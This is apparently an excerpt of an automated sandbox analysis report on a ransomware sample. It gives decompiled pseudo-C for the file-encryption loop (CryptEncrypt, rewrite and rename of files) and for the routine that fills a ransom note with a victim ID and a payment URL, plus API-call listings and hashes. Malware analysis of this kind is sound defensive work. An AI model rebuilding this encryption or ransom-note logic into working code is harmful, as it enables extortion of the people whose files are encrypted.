                                      					_t161 = VirtualAlloc(0, 8, 0x3000, 4);
                                      					 *_t161 = 0;
                                      					 *(_t161 + 4) = 0;
                                      					_t106 = VirtualAlloc(0, 0x100001, 0x3000, 4);
                                      					_t165 = 0;
                                      					_v28 = _t106;
                                      					_v24 = 0;
                                      					while(ReadFile(_t142, _t106, 0x100000,  &_v12, 0) != 0) {
                                      						_t121 = _v12;
                                      						if(_t121 == 0) {
                                      							break;
                                      						}
                                      						_t145 = 0;
                                      						_v60 = 0;
                                      						_t165 =  <  ? 1 : _t165;
                                      						 *_t161 =  *_t161 + _t121;
                                      						asm("adc [edi+0x4], ebx");
                                      						_t122 = _v12;
                                      						_v8 = _t122;
                                      						if((_t122 & 0x0000000f) == 0) {
                                      							L12:
                                      							_t123 = VirtualAlloc(0, _t122, 0x3000, 4);
                                      							_t42 =  &_v8; // 0x406438
                                      							_v56 = _t123;
                                      							E004084E0(_t123, _v28,  *_t42);
                                      							_t125 = _v12;
                                      							_t171 = _t171 + 0xc;
                                      							_v64 = _t125;
                                      							if(VirtualAlloc(0, _t125, 0x3000, 4) != 0) {
                                      								E00403500(_v56, _v64,  &_v60,  &_v388,  &_v104, _t126);
                                      								_t145 = _v60;
                                      								_t171 = _t171 + 0x10;
                                      							}
                                      							VirtualFree(_v56, 0, 0x8000);
                                      							SetFilePointer(_v36,  ~_v8, 0, 1);
                                      							if(WriteFile(_v36, _t145, _v12,  &_v16, 0) == 0) {
                                      								_t165 = 1;
                                      								_v24 = 1;
                                      							}
                                      							VirtualFree(_t145, 0, 0x8000);
                                      							_t142 = _v36;
                                      							if(_t165 == 0) {
                                      								_t106 = _v28;
                                      								continue;
                                      							} else {
                                      								break;
                                      							}
                                      						}
                                      						do {
                                      							_t122 = _t122 + 1;
                                      						} while ((_t122 & 0x0000000f) != 0);
                                      						_v12 = _t122;
                                      						goto L12;
                                      					}
                                      					VirtualFree(_v28, 0, 0x8000);
                                      					if(_v24 == 0) {
                                      						WriteFile(_t142, _v44, 0x100,  &_v16, 0);
                                      						WriteFile(_t142, _v48, 0x100,  &_v16, 0);
                                      						WriteFile(_t142, _t161, 0x10,  &_v16, 0);
                                      					}
                                      					CloseHandle(_t142);
                                      					_t164 =  *_t161;
                                      					_v8 =  *(_t161 + 4);
                                      					VirtualFree(_t161, 0, 0x8000);
                                      					VirtualFree(_v44, 0, 0x8000);
                                      					VirtualFree(_v48, 0, 0x8000);
                                      					_t160 = _v32;
                                      					if(_v24 == 0) {
                                      						MoveFileW(_v52, _t160);
                                      					}
                                      					goto L23;
                                      				}
                                      				GetLastError();
                                      				goto L22;
                                      			}



















































                                      0x004035eb
                                      0x004035ed
                                      0x004035f1
                                      0x004035ff
                                      0x00403608
                                      0x00403613
                                      0x0040361f
                                      0x00403621
                                      0x0040363c
                                      0x0040363e
                                      0x00403647
                                      0x0040364a
                                      0x00403651
                                      0x00403658
                                      0x00403663
                                      0x00403669
                                      0x00403676
                                      0x0040367e
                                      0x0040367f
                                      0x0040368a
                                      0x0040368f
                                      0x00403693
                                      0x0040369b
                                      0x004036a0
                                      0x004036b0
                                      0x004036c6
                                      0x004036c8
                                      0x004036de
                                      0x004036e4
                                      0x004036e9
                                      0x004036ec
                                      0x004036f1
                                      0x004036f3
                                      0x004036f8
                                      0x00403703
                                      0x00403706
                                      0x0040370a
                                      0x00403711
                                      0x0040371f
                                      0x0040372a
                                      0x0040372f
                                      0x0040397c
                                      0x0040397c
                                      0x0040397f
                                      0x00403982
                                      0x0040398a
                                      0x0040398d
                                      0x00403990
                                      0x00403998
                                      0x004039a5
                                      0x004039a5
                                      0x00403745
                                      0x0040374a
                                      0x0040374f
                                      0x0040376a
                                      0x0040376f
                                      0x0040378d
                                      0x0040378f
                                      0x00403795
                                      0x00000000
                                      0x00403976
                                      0x004037aa
                                      0x004037b8
                                      0x004037be
                                      0x004037c5
                                      0x004037c7
                                      0x004037c9
                                      0x004037cc
                                      0x004037d4
                                      0x004037ef
                                      0x004037f4
                                      0x00000000
                                      0x00000000
                                      0x004037fa
                                      0x00403806
                                      0x00403809
                                      0x0040380c
                                      0x0040380e
                                      0x00403811
                                      0x00403814
                                      0x00403819
                                      0x00403828
                                      0x00403832
                                      0x00403838
                                      0x0040383b
                                      0x00403842
                                      0x00403847
                                      0x0040384a
                                      0x0040384d
                                      0x00403862
                                      0x0040387a
                                      0x0040387f
                                      0x00403882
                                      0x00403882
                                      0x0040388f
                                      0x004038a2
                                      0x004038bd
                                      0x004038bf
                                      0x004038c4
                                      0x004038c4
                                      0x004038cf
                                      0x004038d5
                                      0x004038da
                                      0x004037d1
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004038da
                                      0x00403820
                                      0x00403820
                                      0x00403821
                                      0x00403825
                                      0x00000000
                                      0x00403825
                                      0x004038ea
                                      0x004038f4
                                      0x0040390b
                                      0x0040391c
                                      0x00403928
                                      0x00403928
                                      0x0040392b
                                      0x00403934
                                      0x00403944
                                      0x00403947
                                      0x00403953
                                      0x0040395f
                                      0x00403965
                                      0x00403968
                                      0x0040396e
                                      0x0040396e
                                      0x00000000
                                      0x00403968
                                      0x00403751
                                      0x00000000

                                      APIs
                                      • GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 004035F4
                                      • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 004035FF
                                      • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0040363A
                                      • lstrcpyW.KERNEL32 ref: 00403658
                                      • lstrcatW.KERNEL32(00000000,0047002E), ref: 00403663
                                        • Part of subcall function 00407DB0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,74CB66A0,00000000), ref: 00407DD0
                                        • Part of subcall function 00407DB0: VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 00407DF8
                                        • Part of subcall function 00407DB0: GetModuleHandleA.KERNEL32(?), ref: 00407E4D
                                        • Part of subcall function 00407DB0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407E5B
                                        • Part of subcall function 00407DB0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407E6A
                                        • Part of subcall function 00407DB0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407E8E
                                        • Part of subcall function 00407DB0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00407E9C
                                        • Part of subcall function 00407DB0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EB0
                                        • Part of subcall function 00407DB0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EBE
                                      • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 004036C6
                                      • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 004036F1
                                        • Part of subcall function 00406000: EnterCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000,00000000,?,00000800), ref: 0040600B
                                        • Part of subcall function 00406000: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,00403724,00000000,00000000,00000000), ref: 0040602E
                                        • Part of subcall function 00406000: GetLastError.KERNEL32(?,00403724,00000000,00000000,00000000), ref: 00406038
                                        • Part of subcall function 00406000: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00403724,00000000,00000000,00000000), ref: 00406054
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403998
                                        • Part of subcall function 00406000: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00403724,00000000,00000000), ref: 00406089
                                        • Part of subcall function 00406000: CryptGetKeyParam.ADVAPI32(00000000,00000008,$7@,0000000A,00000000,?,00403724,00000000), ref: 004060AA
                                        • Part of subcall function 00406000: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,$7@,?,00403724,00000000), ref: 004060D2
                                        • Part of subcall function 00406000: GetLastError.KERNEL32(?,00403724,00000000), ref: 004060DB
                                        • Part of subcall function 00406000: CryptReleaseContext.ADVAPI32(00000000,00000000,?,00403724,00000000,00000000), ref: 004060F8
                                        • Part of subcall function 00406000: LeaveCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000), ref: 00406103
                                      • GetLastError.KERNEL32 ref: 00403751
                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 00403787
                                      • VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000004), ref: 004037A6
                                      • VirtualAlloc.KERNEL32(00000000,00100001,00003000,00000004), ref: 004037C5
                                      • ReadFile.KERNEL32(00000000,00000000,00100000,?,00000000), ref: 004037E1
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00403832
                                      • _memmove.LIBCMT ref: 00403842
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0040385A
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040388F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Crypt$Alloc$Context$FileFree$AcquireErrorLastRelease$AttributesCriticalSection$AddressCreateEncryptEnterHandleImportLeaveLibraryLoadModuleParamProcRead_memmovelstrcatlstrcpy
                                      • String ID: $.$8d@$B$D
                                      • API String ID: 837238375-279925716
                                      • Opcode ID: 4a689ba4f940d7686604084ce9a7d8dc86564dea9efd080fee87f529fd1c3001
                                      • Instruction ID: e6440529c24e0b0f2c5be8c2954fde7d882e22268c9ef2e78ee628bee86a44a3
                                      • Opcode Fuzzy Hash: 4a689ba4f940d7686604084ce9a7d8dc86564dea9efd080fee87f529fd1c3001
                                      • Instruction Fuzzy Hash: 28B15DB1E40309BBEB119F94CD45FEEBBB8AB48700F204125F644BA2D1DBB45E448B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 47%
                                      			E004040A0(void* __ecx) {
                                      				char _v148;
                                      				char _v152;
                                      				void* _v156;
                                      				short _v164;
                                      				intOrPtr _v168;
                                      				intOrPtr _v172;
                                      				intOrPtr _v176;
                                      				intOrPtr _v180;
                                      				intOrPtr _v184;
                                      				intOrPtr _v188;
                                      				intOrPtr _v192;
                                      				intOrPtr _v196;
                                      				intOrPtr _v200;
                                      				intOrPtr _v204;
                                      				intOrPtr _v208;
                                      				intOrPtr _v212;
                                      				intOrPtr _v216;
                                      				intOrPtr _v220;
                                      				intOrPtr _v224;
                                      				intOrPtr _v228;
                                      				char _v232;
                                      				WCHAR* _v236;
                                      				WCHAR* _v240;
                                      				void* _t44;
                                      				void* _t48;
                                      				void* _t50;
                                      				signed int _t51;
                                      				void* _t52;
                                      				WCHAR* _t56;
                                      				signed short _t60;
                                      				signed short* _t61;
                                      				WCHAR* _t68;
                                      				signed int _t73;
                                      				signed int _t74;
                                      				void* _t77;
                                      				void* _t80;
                                      				long _t83;
                                      				WCHAR* _t84;
                                      				signed int _t87;
                                      				void* _t88;
                                      				WCHAR* _t90;
                                      				void* _t92;
                                      				WCHAR* _t113;
                                      
                                      				if( *0x412b04 != 0) {
                                      					L25:
                                      					return _t44;
                                      				}
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				E004039B0( &_v148);
                                      				E00406D90( &_v236);
                                      				_t87 = E00406BA0( &_v236);
                                      				_t83 = 0x42 + _t87 * 2;
                                      				_t48 = VirtualAlloc(0, _t83, 0x3000, 0x40);
                                      				_v240 = _t48;
                                      				if(_t48 == 0 || 0x40 + _t87 * 2 >= _t83) {
                                      					_t88 = 0;
                                      				} else {
                                      					_t88 = _t48;
                                      				}
                                      				E004069A0( &_v152, _t88);
                                      				_t50 = E00407BA0(_t88, L"ransom_id=");
                                      				_t51 = lstrlenW(L"ransom_id=");
                                      				asm("movdqa xmm1, [0x410940]");
                                      				_t68 = 0x412000;
                                      				_t77 = 0xad;
                                      				_t90 = _t50 + _t51 * 2;
                                      				_t52 = 0xad0;
                                      				_v240 = _t90;
                                      				do {
                                      					_t13 =  &(_t68[8]); // 0x44004e
                                      					_t68 = _t13;
                                      					asm("movdqu xmm0, [ecx-0x10]");
                                      					asm("pxor xmm0, xmm1");
                                      					asm("movdqu [ecx-0x10], xmm0");
                                      					_t77 = _t77 - 1;
                                      				} while (_t77 != 0);
                                      				do {
                                      					 *(_t52 + 0x412000) =  *(_t52 + 0x412000) ^ 0x00000005;
                                      					_t52 = _t52 + 1;
                                      				} while (_t52 < 0xad6);
                                      				 *0x412b04 = 0x412000;
                                      				_t84 = E00407BA0(0x412000, L"{USERID}");
                                      				if(_t84 == 0) {
                                      					L21:
                                      					_v232 = 0x740068;
                                      					_v228 = 0x700074;
                                      					_v224 = 0x2f003a;
                                      					_v220 = 0x67002f;
                                      					_v216 = 0x630064;
                                      					_v212 = 0x670062;
                                      					_v208 = 0x760068;
                                      					_v204 = 0x79006a;
                                      					_v200 = 0x790071;
                                      					_v196 = 0x6a0037;
                                      					_v192 = 0x6c0063;
                                      					_v188 = 0x2e006b;
                                      					_v184 = 0x6e006f;
                                      					_v180 = 0x6f0069;
                                      					_v176 = 0x2e006e;
                                      					_v172 = 0x6f0074;
                                      					_v168 = 0x2f0070;
                                      					_v164 = 0;
                                      					_t113 =  *0x412ae4; // 0x8d0000
                                      					if(_t113 == 0) {
                                      						_t56 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                      						 *0x412ae4 = _t56;
                                      						if(_t56 != 0) {
                                      							wsprintfW(_t56, L"%s%s",  &_v232, _t90);
                                      						}
                                      					}
                                      					VirtualFree(_v156, 0, 0x8000);
                                      					_t44 = E00407720( &_v152);
                                      					goto L25;
                                      				}
                                      				while(1) {
                                      					L11:
                                      					lstrcpyW(_t84, _t90);
                                      					_t84[lstrlenW(_t84)] = 0x20;
                                      					_t84 = 0x412000;
                                      					_t60 =  *0x412000; // 0xfeff
                                      					if(_t60 == 0) {
                                      						goto L21;
                                      					}
                                      					_t73 = _t60 & 0x0000ffff;
                                      					_t92 = 0x412000 - L"{USERID}";
                                      					do {
                                      						_t61 = L"{USERID}";
                                      						if(_t73 == 0) {
                                      							goto L19;
                                      						}
                                      						while(1) {
                                      							_t74 =  *_t61 & 0x0000ffff;
                                      							if(_t74 == 0) {
                                      								break;
                                      							}
                                      							_t80 = ( *(_t92 + _t61) & 0x0000ffff) - _t74;
                                      							if(_t80 != 0) {
                                      								L18:
                                      								if( *_t61 == 0) {
                                      									break;
                                      								}
                                      								goto L19;
                                      							}
                                      							_t61 =  &(_t61[1]);
                                      							if( *(_t92 + _t61) != _t80) {
                                      								continue;
                                      							}
                                      							goto L18;
                                      						}
                                      						_t90 = _v236;
                                      						goto L11;
                                      						L19:
                                      						_t20 =  &(_t84[1]); // 0x2d002d
                                      						_t73 =  *_t20 & 0x0000ffff;
                                      						_t84 =  &(_t84[1]);
                                      						_t92 = _t92 + 2;
                                      					} while (_t73 != 0);
                                      					_t90 = _v236;
                                      					goto L21;
                                      				}
                                      				goto L21;
                                      			}














































                                      0x004040b5
                                      0x0040431c
                                      0x00404321
                                      0x00404321
                                      0x004040bb
                                      0x004040bc
                                      0x004040be
                                      0x004040bf
                                      0x004040c4
                                      0x004040c6
                                      0x004040c7
                                      0x004040c9
                                      0x004040ca
                                      0x004040cc
                                      0x004040cd
                                      0x004040cf
                                      0x004040d0
                                      0x004040d5
                                      0x004040d7
                                      0x004040d8
                                      0x004040e1
                                      0x004040ea
                                      0x004040f8
                                      0x00404101
                                      0x0040410b
                                      0x00404111
                                      0x00404117
                                      0x00404128
                                      0x00404124
                                      0x00404124
                                      0x00404124
                                      0x0040412f
                                      0x0040413b
                                      0x00404147
                                      0x0040414d
                                      0x00404155
                                      0x0040415a
                                      0x0040415f
                                      0x00404162
                                      0x00404167
                                      0x00404170
                                      0x00404170
                                      0x00404170
                                      0x00404173
                                      0x00404178
                                      0x0040417c
                                      0x00404181
                                      0x00404181
                                      0x00404190
                                      0x00404190
                                      0x00404197
                                      0x00404198
                                      0x004041a4
                                      0x004041b8
                                      0x004041bc
                                      0x0040423a
                                      0x0040423c
                                      0x00404244
                                      0x0040424c
                                      0x00404254
                                      0x0040425c
                                      0x00404264
                                      0x0040426c
                                      0x00404274
                                      0x0040427c
                                      0x00404284
                                      0x0040428c
                                      0x00404294
                                      0x0040429c
                                      0x004042a4
                                      0x004042ac
                                      0x004042b4
                                      0x004042bc
                                      0x004042c4
                                      0x004042c9
                                      0x004042cf
                                      0x004042de
                                      0x004042e4
                                      0x004042eb
                                      0x004042f9
                                      0x004042ff
                                      0x004042eb
                                      0x0040430d
                                      0x00404317
                                      0x00000000
                                      0x00404317
                                      0x004041c0
                                      0x004041c0
                                      0x004041c2
                                      0x004041d4
                                      0x004041d8
                                      0x004041dd
                                      0x004041e6
                                      0x00000000
                                      0x00000000
                                      0x004041ea
                                      0x004041ed
                                      0x004041f3
                                      0x004041f3
                                      0x004041fb
                                      0x00000000
                                      0x00000000
                                      0x00404200
                                      0x00404200
                                      0x00404206
                                      0x00000000
                                      0x00000000
                                      0x00404210
                                      0x00404212
                                      0x0040421d
                                      0x00404221
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404221
                                      0x00404214
                                      0x0040421b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040421b
                                      0x00404322
                                      0x00000000
                                      0x00404227
                                      0x00404227
                                      0x00404227
                                      0x0040422b
                                      0x0040422e
                                      0x00404231
                                      0x00404236
                                      0x00000000
                                      0x00404236
                                      0x00000000

                                      APIs
                                        • Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
                                        • Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
                                        • Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E10
                                        • Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
                                        • Part of subcall function 00406D90: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
                                        • Part of subcall function 00406D90: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
                                        • Part of subcall function 00406D90: RegCloseKey.KERNEL32(00000000), ref: 00406ED2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040410B
                                      • lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404147
                                      • lstrcpyW.KERNEL32 ref: 004041C2
                                      • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004041C9
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 004042DE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
                                      • String ID: %s%s$/$7$:$b$c$d$h$h$i$j$k$n$o$p$q$ransom_id=$t$t${USERID}
                                      • API String ID: 4100118565-914392996
                                      • Opcode ID: 9ef8ab6f65e3180621a96e978af0e414a349b7cd4cbb51f09f0a87e37010286e
                                      • Instruction ID: 44f1d7409a56cb0d5c487c66e452f22c269fbcb55178584459732c151bd8d75b
                                      • Opcode Fuzzy Hash: 9ef8ab6f65e3180621a96e978af0e414a349b7cd4cbb51f09f0a87e37010286e
                                      • Instruction Fuzzy Hash: E451F5B06143009AE7209F11DD0976B7BA5EBC0748F404A3EFA817B2D1E7B8AD55C79E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00404186(void* __eax, void* __ebp, WCHAR* _a12, char _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, short _a84, void* _a92, char _a96) {
                                      				void* _t31;
                                      				void* _t35;
                                      				WCHAR* _t36;
                                      				signed short _t40;
                                      				signed short* _t41;
                                      				signed int _t46;
                                      				signed int _t47;
                                      				void* _t50;
                                      				WCHAR* _t51;
                                      				WCHAR* _t53;
                                      				void* _t56;
                                      				WCHAR* _t72;
                                      
                                      				_t31 = __eax;
                                      				do {
                                      					 *(_t31 + 0x412000) =  *(_t31 + 0x412000) ^ 0x00000005;
                                      					_t31 = _t31 + 1;
                                      				} while (_t31 < 0xad6);
                                      				 *0x412b04 = 0x412000;
                                      				_t51 = E00407BA0(0x412000, L"{USERID}");
                                      				if(_t51 != 0) {
                                      					while(1) {
                                      						L4:
                                      						lstrcpyW(_t51, _t53);
                                      						_t51[lstrlenW(_t51)] = 0x20;
                                      						_t51 = 0x412000;
                                      						_t40 =  *0x412000; // 0xfeff
                                      						if(_t40 == 0) {
                                      							goto L14;
                                      						}
                                      						_t46 = _t40 & 0x0000ffff;
                                      						_t56 = 0x412000 - L"{USERID}";
                                      						do {
                                      							_t41 = L"{USERID}";
                                      							if(_t46 == 0) {
                                      								goto L12;
                                      							} else {
                                      								while(1) {
                                      									_t47 =  *_t41 & 0x0000ffff;
                                      									if(_t47 == 0) {
                                      										break;
                                      									}
                                      									_t50 = ( *(_t56 + _t41) & 0x0000ffff) - _t47;
                                      									if(_t50 != 0) {
                                      										L11:
                                      										if( *_t41 == 0) {
                                      											break;
                                      										} else {
                                      											goto L12;
                                      										}
                                      									} else {
                                      										_t41 =  &(_t41[1]);
                                      										if( *(_t56 + _t41) != _t50) {
                                      											continue;
                                      										} else {
                                      											goto L11;
                                      										}
                                      									}
                                      									goto L14;
                                      								}
                                      								_t53 = _a12;
                                      								goto L4;
                                      							}
                                      							goto L14;
                                      							L12:
                                      							_t7 =  &(_t51[1]); // 0x2d002d
                                      							_t46 =  *_t7 & 0x0000ffff;
                                      							_t51 =  &(_t51[1]);
                                      							_t56 = _t56 + 2;
                                      						} while (_t46 != 0);
                                      						_t53 = _a12;
                                      						goto L14;
                                      					}
                                      				}
                                      				L14:
                                      				_a16 = 0x740068;
                                      				_a20 = 0x700074;
                                      				_a24 = 0x2f003a;
                                      				_a28 = 0x67002f;
                                      				_a32 = 0x630064;
                                      				_a36 = 0x670062;
                                      				_a40 = 0x760068;
                                      				_a44 = 0x79006a;
                                      				_a48 = 0x790071;
                                      				_a52 = 0x6a0037;
                                      				_a56 = 0x6c0063;
                                      				_a60 = 0x2e006b;
                                      				_a64 = 0x6e006f;
                                      				_a68 = 0x6f0069;
                                      				_a72 = 0x2e006e;
                                      				_a76 = 0x6f0074;
                                      				_a80 = 0x2f0070;
                                      				_a84 = 0;
                                      				_t72 =  *0x412ae4; // 0x8d0000
                                      				if(_t72 == 0) {
                                      					_t36 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                      					 *0x412ae4 = _t36;
                                      					if(_t36 != 0) {
                                      						wsprintfW(_t36, L"%s%s",  &_a16, _t53);
                                      					}
                                      				}
                                      				VirtualFree(_a92, 0, 0x8000);
                                      				_t35 = E00407720( &_a96);
                                      				return _t35;
                                      			}















                                      0x00404186
                                      0x00404190
                                      0x00404190
                                      0x00404197
                                      0x00404198
                                      0x004041a4
                                      0x004041b8
                                      0x004041bc
                                      0x004041c0
                                      0x004041c0
                                      0x004041c2
                                      0x004041d4
                                      0x004041d8
                                      0x004041dd
                                      0x004041e6
                                      0x00000000
                                      0x00000000
                                      0x004041ea
                                      0x004041ed
                                      0x004041f3
                                      0x004041f3
                                      0x004041fb
                                      0x00000000
                                      0x00404200
                                      0x00404200
                                      0x00404200
                                      0x00404206
                                      0x00000000
                                      0x00000000
                                      0x00404210
                                      0x00404212
                                      0x0040421d
                                      0x00404221
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404214
                                      0x00404214
                                      0x0040421b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040421b
                                      0x00000000
                                      0x00404212
                                      0x00404322
                                      0x00000000
                                      0x00404322
                                      0x00000000
                                      0x00404227
                                      0x00404227
                                      0x00404227
                                      0x0040422b
                                      0x0040422e
                                      0x00404231
                                      0x00404236
                                      0x00000000
                                      0x00404236
                                      0x004041c0
                                      0x0040423a
                                      0x0040423c
                                      0x00404244
                                      0x0040424c
                                      0x00404254
                                      0x0040425c
                                      0x00404264
                                      0x0040426c
                                      0x00404274
                                      0x0040427c
                                      0x00404284
                                      0x0040428c
                                      0x00404294
                                      0x0040429c
                                      0x004042a4
                                      0x004042ac
                                      0x004042b4
                                      0x004042bc
                                      0x004042c4
                                      0x004042c9
                                      0x004042cf
                                      0x004042de
                                      0x004042e4
                                      0x004042eb
                                      0x004042f9
                                      0x004042ff
                                      0x004042eb
                                      0x0040430d
                                      0x00404317
                                      0x00404321

                                      APIs
                                      • lstrcpyW.KERNEL32 ref: 004041C2
                                      • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004041C9
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 004042DE
                                      • wsprintfW.USER32 ref: 004042F9
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040430D
                                      Strings
                                      Memory Dump Source
